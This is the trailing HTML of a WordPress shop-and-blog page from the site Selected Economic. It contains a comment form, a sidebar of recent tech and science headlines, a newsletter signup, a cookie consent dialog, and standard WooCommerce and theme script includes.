				<p class="comment-form-comment"><label for="comment">Comment</label> <textarea id="comment" name="comment" cols="45" rows="8" maxlength="65525" required="required"></textarea></p><p class="comment-form-author"><label for="author">Name <span class="required">*</span></label> <input id="author" name="author" type="text" value="" size="30" maxlength="245" required='required' /></p>
<p class="comment-form-email"><label for="email">Email <span class="required">*</span></label> <input id="email" name="email" type="email" value="" size="30" maxlength="100" aria-describedby="email-notes" required='required' /></p>
<p class="comment-form-url"><label for="url">Website</label> <input id="url" name="url" type="url" value="" size="30" maxlength="200" /></p>
<p class="comment-form-cookies-consent"><input id="wp-comment-cookies-consent" name="wp-comment-cookies-consent" type="checkbox" value="yes" /><label for="wp-comment-cookies-consent">Save my name, email, and website in this browser for the next time I comment.</label></p>
<p class="form-submit"><input name="submit" type="submit" id="submit" class="submit" value="ADD COMMENT" /> <input type='hidden' name='comment_post_ID' value='610' id='comment_post_ID' />
<input type='hidden' name='comment_parent' id='comment_parent' value='0' />
</p>			</form>
			</div><!-- #respond -->
	
</div><!-- #comments -->
                </main>
            </div>

            		<aside id="secondaryright" class="widget-area right" role="complementary">
			<aside id="recent-posts-widget-with-thumbnails-3" class="widget recent-posts-widget-with-thumbnails"><div id="rpwwt-recent-posts-widget-with-thumbnails-3" class="rpwwt-widget">
	<h2 class="spstore widget-title">Popular Articles from our Blog</h2>	<ul>
			<li><a href="https://selected-economic.com/grow-first-ads-later-facebooks-strategy-for-desktop-mobile-and-now-instagram/"><img width="75" height="75" src="https://selected-economic.com/wp-content/uploads/2019/11/1361927701-instagram-copy-100x100.png" class="attachment-75x75 size-75x75 wp-post-image" alt="1361927701-Instagram copy" srcset="https://selected-economic.com/wp-content/uploads/2019/11/1361927701-instagram-copy-100x100.png 100w, https://selected-economic.com/wp-content/uploads/2019/11/1361927701-instagram-copy-150x150.png 150w" sizes="(max-width: 75px) 100vw, 75px" /><span class="rpwwt-post-title">Grow First, Ads Later: Facebook’s Strategy For Desktop, Mobile, And Now Instagram</span></a><div class="rpwwt-post-categories">In Tech Industry</div></li>
			<li><a href="https://selected-economic.com/amazon-moments-lets-developers-reward-customers-with-actual-gifts-not-just-virtual-ones/"><img width="75" height="75" src="https://selected-economic.com/wp-content/uploads/2019/11/image004-100x100.png" class="attachment-75x75 size-75x75 wp-post-image" alt="" srcset="https://selected-economic.com/wp-content/uploads/2019/11/image004-100x100.png 100w, https://selected-economic.com/wp-content/uploads/2019/11/image004-150x150.png 150w, https://selected-economic.com/wp-content/uploads/2019/11/image004-300x300.png 300w" sizes="(max-width: 75px) 100vw, 75px" /><span class="rpwwt-post-title">Amazon Moments lets developers reward customers with actual gifts, not just virtual ones</span></a><div class="rpwwt-post-categories">In Tech Industry</div></li>
			<li><a href="https://selected-economic.com/login-with-facebook-data-hijacked-by-javascript-trackers/"><img width="75" height="75" src="https://selected-economic.com/wp-content/uploads/2019/11/facebook-phone-app-api-100x100.png" class="attachment-75x75 size-75x75 wp-post-image" alt="" srcset="https://selected-economic.com/wp-content/uploads/2019/11/facebook-phone-app-api-100x100.png 100w, https://selected-economic.com/wp-content/uploads/2019/11/facebook-phone-app-api-150x150.png 150w, https://selected-economic.com/wp-content/uploads/2019/11/facebook-phone-app-api-300x300.png 300w" sizes="(max-width: 75px) 100vw, 75px" /><span class="rpwwt-post-title">Login With Facebook data hijacked by JavaScript trackers</span></a><div class="rpwwt-post-categories">In Tech Industry</div></li>
			<li><a href="https://selected-economic.com/scientists-discover-nightmare-fish-in-the-deep-dark-ocean-can-see-in-color/"><img width="75" height="75" src="https://selected-economic.com/wp-content/uploads/2019/11/qbi-fish-colour-vision-smaller-100x100.jpg" class="attachment-75x75 size-75x75 wp-post-image" alt="qbi-fish-colour-vision-smaller" srcset="https://selected-economic.com/wp-content/uploads/2019/11/qbi-fish-colour-vision-smaller-100x100.jpg 100w, https://selected-economic.com/wp-content/uploads/2019/11/qbi-fish-colour-vision-smaller-150x150.jpg 150w, https://selected-economic.com/wp-content/uploads/2019/11/qbi-fish-colour-vision-smaller-300x300.jpg 300w" sizes="(max-width: 75px) 100vw, 75px" /><span class="rpwwt-post-title">Scientists discover nightmare fish in the deep, dark ocean can see in color</span></a><div class="rpwwt-post-categories">In Sci-Tech</div></li>
			<li><a href="https://selected-economic.com/scientists-may-have-uncovered-what-dinosaur-dna-looked-like/"><img width="75" height="75" src="https://selected-economic.com/wp-content/uploads/2019/11/1994-JurassicPark-100x100.jpg" class="attachment-75x75 size-75x75 wp-post-image" alt="1994-JurassicPark.jpg" srcset="https://selected-economic.com/wp-content/uploads/2019/11/1994-JurassicPark-100x100.jpg 100w, https://selected-economic.com/wp-content/uploads/2019/11/1994-JurassicPark-150x150.jpg 150w, https://selected-economic.com/wp-content/uploads/2019/11/1994-JurassicPark-300x300.jpg 300w" sizes="(max-width: 75px) 100vw, 75px" /><span class="rpwwt-post-title">Scientists may have uncovered what dinosaur DNA looked like</span></a><div class="rpwwt-post-categories">In Sci-Tech</div></li>
		</ul>
</div><!-- .rpwwt-widget -->
</aside><aside id="newsletterwidget-3" class="widget widget_newsletterwidget"><h2 class="spstore widget-title">Do you want to subscribe for us?</h2><div class="tnp tnp-widget"><form method="post" action="https://selected-economic.com/?na=s" onsubmit="return newsletter_check(this)">

<input type="hidden" name="nlang" value="">
<input type="hidden" name="nr" value="widget">
<input type='hidden' name='nl[]' value='0'>
<div class="tnp-field tnp-field-firstname"><label>First name or full name</label><input class="tnp-firstname" type="text" name="nn" ></div>
<div class="tnp-field tnp-field-email"><label>Email</label><input class="tnp-email" type="email" name="ne" required></div>
<div class="tnp-field tnp-field-privacy"><label><input type="checkbox" name="ny" required class="tnp-privacy">&nbsp;By continuing, you accept the privacy policy</label></div>
<div class="tnp-field tnp-field-button"><input class="tnp-submit" type="submit" value="Yes! Send me news!" >
</div>
</form>
</div>
</aside>		</aside><!-- #secondary -->
	
        </div>
    </div>
</div>

		<footer class="footer" itemscope="itemscope" itemtype="http://schema.org/WPFooter">
			<div class="footer-middle">
			<div class="container">                
			<div class="clear">                

				
				
				
				 
					
			</div>
			</div>
		</div>
			<div class="footer-top">
		  <div class="container">
	        <div class="sociallink">
	      		      <div class="social">
        <ul>
                                                                    </ul>
      </div>
    	            
	        </div>
	        <div class="paymentlogo">
	        	      <div class="payment-accept">
                                                      </div>
      	        </div>
		  </div>
		</div>
				<div class="footer-bottom">
		    <div class="container">
	       		<div class="coppyright">
					&copy; 2020 Selected Economic -  WordPress Theme : SparkleStore  By <a href=" http://sparklewpthemes.com/ " rel="designer" target="_blank">Sparkle Themes</a>				</div><!-- .site-info -->

	            <div class="companylinks">
	          		<ul id="menu-legal-menu" class=""><li id="menu-item-6" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-6"><a href="/terms-of-service">Terms of Service</a></li>
<li id="menu-item-8" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-8"><a href="/privacy-policy">Privacy Policy</a></li>
<li id="menu-item-10" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-10"><a href="/dmca">DMCA</a></li>
<li id="menu-item-13" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-13"><a href="/cookie-privacy-policy">Cookie Privacy Policy</a></li>
<li id="menu-item-17" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-17"><a href="/returns">Returns</a></li>
<li id="menu-item-23" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-23"><a href="/shipping-and-delivery">Shipping and delivery</a></li>
</ul>	            </div>

		    </div>
		</div>
				</footer>
		    

</div><!-- #page -->

<a href="#" class="scrollup">
	<i class="fa fa-angle-up" aria-hidden="true"></i>
</a>

<div id="cookie-law-info-bar"><span>This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. <a class="cli_settings_button"   style="margin:5px 20px 5px 20px;" >Cookie settings</a><a  data-cli_action="accept" id="cookie_action_close_header"  class="medium cli-plugin-button cli-plugin-main-button cookie_action_close_header cli_action_button" style="display:inline-block;  margin:5px; ">ACCEPT</a></span></div><div id="cookie-law-info-again" style="display:none;"><span id="cookie_hdr_showagain">Privacy & Cookies Policy</span></div><div class="cli-modal" id="cliSettingsPopup" tabindex="-1" role="dialog" aria-labelledby="cliSettingsPopup" aria-hidden="true">
  <div class="cli-modal-dialog" role="document">
    <div class="cli-modal-content cli-bar-popup">
      <button type="button" class="cli-modal-close" id="cliModalClose">
        <svg class="" viewBox="0 0 24 24"><path d="M19 6.41l-1.41-1.41-5.59 5.59-5.59-5.59-1.41 1.41 5.59 5.59-5.59 5.59 1.41 1.41 5.59-5.59 5.59 5.59 1.41-1.41-5.59-5.59z"></path><path d="M0 0h24v24h-24z" fill="none"></path></svg>
      </button>
      <div class="cli-modal-body">
        <div class="cli-container-fluid cli-tab-container">
    <div class="cli-row">
        <div class="cli-col-12 cli-align-items-stretch cli-px-0">
            <div class="cli-privacy-overview">
                <h4>Privacy Overview</h4>                                   
                <div class="cli-privacy-content">
                    <div class="cli-privacy-content-text">This website uses cookies to improve your experience while you navigate through the website. Out of these cookies, the cookies that are categorized as necessary are stored on your browser as they are essential for the working of basic functionalities of the website. We also use third-party cookies that help us analyze and understand how you use this website. These cookies will be stored in your browser only with your consent. You also have the option to opt-out of these cookies. But opting out of some of these cookies may have an effect on your browsing experience.</div>
                </div>
                <a class="cli-privacy-readmore" data-readmore-text="Show more" data-readless-text="Show less"></a>            </div>
        </div>  
        <div class="cli-col-12 cli-align-items-stretch cli-px-0 cli-tab-section-container">
            <div class="cli-tab-section cli-privacy-tab">
                <div class="cli-tab-header">
                    <a class="cli-nav-link cli-settings-mobile" >
                        Privacy Overview                    </a>
                </div>
                <div class="cli-tab-content">
                    <div class="cli-tab-pane cli-fade">
                        <p>This website uses cookies to improve your experience while you navigate through the website. Out of these cookies, the cookies that are categorized as necessary are stored on your browser as they are essential for the working of basic functionalities of the website. We also use third-party cookies that help us analyze and understand how you use this website. These cookies will be stored in your browser only with your consent. You also have the option to opt-out of these cookies. But opting out of some of these cookies may have an effect on your browsing experience.</p>
                    </div>
                </div>

            </div>
              
                            <div class="cli-tab-section">
                    <div class="cli-tab-header">
                        <a class="cli-nav-link cli-settings-mobile" data-target="necessary" data-toggle="cli-toggle-tab" >
                            Necessary 
                        </a>
                    
                    <span class="cli-necessary-caption">Always Enabled</span>                     </div>
                    <div class="cli-tab-content">
                        <div class="cli-tab-pane cli-fade" data-id="necessary">
                            <p>Necessary cookies are absolutely essential for the website to function properly. This category only includes cookies that ensures basic functionalities and security features of the website. These cookies do not store any personal information.</p>
                        </div>
                    </div>
                </div>
              
                            <div class="cli-tab-section">
                    <div class="cli-tab-header">
                        <a class="cli-nav-link cli-settings-mobile" data-target="non-necessary" data-toggle="cli-toggle-tab" >
                            Non-necessary 
                        </a>
                    <div class="cli-switch">
                        <input type="checkbox" id="checkbox-non-necessary" class="cli-user-preference-checkbox" data-id="checkbox-non-necessary" checked />
                        <label for="checkbox-non-necessary" class="cli-slider" data-cli-enable="Enabled" data-cli-disable="Disabled">Non-necessary</label>
                    </div>                    </div>
                    <div class="cli-tab-content">
                        <div class="cli-tab-pane cli-fade" data-id="non-necessary">
                            <p>Any cookies that may not be particularly necessary for the website to function and is used specifically to collect user personal data via analytics, ads, other embedded contents are termed as non-necessary cookies. It is mandatory to procure user consent prior to running these cookies on your website.</p>
                        </div>
                    </div>
                </div>
                       
        </div>
    </div> 
</div> 
      </div>
    </div>
  </div>
</div>
<div class="cli-modal-backdrop cli-fade cli-settings-overlay"></div>
<div class="cli-modal-backdrop cli-fade cli-popupbar-overlay"></div>
<script type="text/javascript">
  /* <![CDATA[ */
  cli_cookiebar_settings='{"animate_speed_hide":"500","animate_speed_show":"500","background":"#FFF","border":"#b1a6a6c2","border_on":false,"button_1_button_colour":"#000","button_1_button_hover":"#000000","button_1_link_colour":"#fff","button_1_as_button":true,"button_1_new_win":false,"button_2_button_colour":"#333","button_2_button_hover":"#292929","button_2_link_colour":"#444","button_2_as_button":false,"button_2_hidebar":false,"button_3_button_colour":"#000","button_3_button_hover":"#000000","button_3_link_colour":"#fff","button_3_as_button":true,"button_3_new_win":false,"button_4_button_colour":"#000","button_4_button_hover":"#000000","button_4_link_colour":"#62a329","button_4_as_button":false,"font_family":"inherit","header_fix":false,"notify_animate_hide":true,"notify_animate_show":false,"notify_div_id":"#cookie-law-info-bar","notify_position_horizontal":"right","notify_position_vertical":"bottom","scroll_close":false,"scroll_close_reload":false,"accept_close_reload":false,"reject_close_reload":false,"showagain_tab":true,"showagain_background":"#fff","showagain_border":"#000","showagain_div_id":"#cookie-law-info-again","showagain_x_position":"100px","text":"#000","show_once_yn":false,"show_once":"10000","logging_on":false,"as_popup":false,"popup_overlay":true,"bar_heading_text":"","cookie_bar_as":"banner","popup_showagain_position":"bottom-right","widget_position":"left"}';
  /* ]]> */
</script>	<script type="text/javascript">
		var c = document.body.className;
		c = c.replace(/woocommerce-no-js/, 'woocommerce-js');
		document.body.className = c;
	</script>
	<script type='text/javascript' src='https://selected-economic.com/wp-content/plugins/woocommerce/assets/js/jquery-blockui/jquery.blockUI.min.js?ver=2.70'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var wc_add_to_cart_params = {"ajax_url":"\/wp-admin\/admin-ajax.php","wc_ajax_url":"\/?wc-ajax=%%endpoint%%","i18n_view_cart":"View cart","cart_url":"https:\/\/selected-economic.com\/cart\/","is_cart":"","cart_redirect_after_add":"no"};
/* ]]> */
</script>
<script type='text/javascript' src='https://selected-economic.com/wp-content/plugins/woocommerce/assets/js/frontend/add-to-cart.min.js?ver=3.8.1'></script>
<script type='text/javascript' src='https://selected-economic.com/wp-content/plugins/woocommerce/assets/js/js-cookie/js.cookie.min.js?ver=2.1.4'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var woocommerce_params = {"ajax_url":"\/wp-admin\/admin-ajax.php","wc_ajax_url":"\/?wc-ajax=%%endpoint%%"};
/* ]]> */
</script>
<script type='text/javascript' src='https://selected-economic.com/wp-content/plugins/woocommerce/assets/js/frontend/woocommerce.min.js?ver=3.8.1'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var wc_cart_fragments_params = {"ajax_url":"\/wp-admin\/admin-ajax.php","wc_ajax_url":"\/?wc-ajax=%%endpoint%%","cart_hash_key":"wc_cart_hash_5f9c437b18c97ede17d21fbe2176ad95","fragment_name":"wc_fragments_5f9c437b18c97ede17d21fbe2176ad95","request_timeout":"5000"};
/* ]]> */
</script>
<script type='text/javascript' src='https://selected-economic.com/wp-content/plugins/woocommerce/assets/js/frontend/cart-fragments.min.js?ver=3.8.1'></script>
<script type='text/javascript' src='https://selected-economic.com/wp-content/plugins/woocommerce/assets/js/flexslider/jquery.flexslider.min.js?ver=2.7.2'></script>
<script type='text/javascript' src='https://selected-economic.com/wp-content/themes/sparklestore/assets/library/lightslider/js/lightslider.js?ver=1.0.0'></script>
<script type='text/javascript' src='https://selected-economic.com/wp-content/themes/sparklestore/assets/library/theia-sticky-sidebar/js/theia-sticky-sidebar.min.js?ver=1.0.0'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var sparklestore_tabs_ajax_action = {"ajaxurl":"https:\/\/selected-economic.com\/wp-admin\/admin-ajax.php"};
/* ]]> */
</script>
<script type='text/javascript' src='https://selected-economic.com/wp-content/themes/sparklestore/assets/js/common.js?ver=1.0.0'></script>
<script type='text/javascript' src='https://selected-economic.com/wp-content/themes/sparklestore/assets/js/skip-link-focus-fix.js?ver=1.0.0'></script>
<script type='text/javascript' src='https://selected-economic.com/wp-content/themes/sparklestore/assets/js/navigation.js?ver=1.0.0'></script>
<script type='text/javascript' src='https://selected-economic.com/wp-includes/js/comment-reply.min.js?ver=5.2.5'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var newsletter = {"messages":{"email_error":"Email address is not correct","name_error":"Name is required","surname_error":"Last name is required","profile_error":"A mandatory field is not filled in","privacy_error":"You must accept the privacy policy"},"profile_max":"20"};
/* ]]> */
</script>
<script type='text/javascript' src='https://selected-economic.com/wp-content/plugins/newsletter/subscription/validate.js?ver=6.4.2'></script>
<script type='text/javascript' src='https://selected-economic.com/wp-includes/js/wp-embed.min.js?ver=5.2.5'></script>

</body>

</html>
